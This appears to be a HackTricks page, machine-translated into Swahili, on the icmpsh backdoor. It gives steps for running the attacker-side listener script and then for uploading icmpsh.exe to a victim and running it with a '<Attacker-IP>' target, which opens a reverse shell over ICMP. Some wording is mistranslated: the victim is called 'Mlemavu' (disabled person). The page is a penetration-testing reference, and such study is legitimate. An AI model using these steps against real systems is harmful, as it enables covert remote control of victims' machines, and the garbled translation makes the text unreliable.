hacktricks/backdoors/icmpsh.md

2.8 KiB

{% hint style="success" %} Jifunze na zoea AWS Hacking:Mafunzo ya HackTricks AWS Timu Nyekundu Mtaalam (ARTE)
Jifunze na zoea GCP Hacking: Mafunzo ya HackTricks GCP Timu Nyekundu Mtaalam (GRTE)

Support HackTricks
{% endhint %}

Pakua mlango wa nyuma kutoka: https://github.com/inquisb/icmpsh

Upande wa Mteja

Tekeleza scripti: run.sh

Ikiwa unapata kosa, jaribu kubadilisha mistari:

IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1)
IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')

Kwa:

echo Please insert the IP where you want to listen
read IP

Upande wa Mlemavu

Pakia icmpsh.exe kwa mlemavu na tekeleza:

icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128

{% hint style="success" %} Jifunze na zoea AWS Hacking:Mafunzo ya HackTricks AWS Timu Nyekundu Mtaalam (ARTE)
Jifunze na zoea GCP Hacking: Mafunzo ya HackTricks GCP Timu Nyekundu Mtaalam (GRTE)

Support HackTricks
{% endhint %}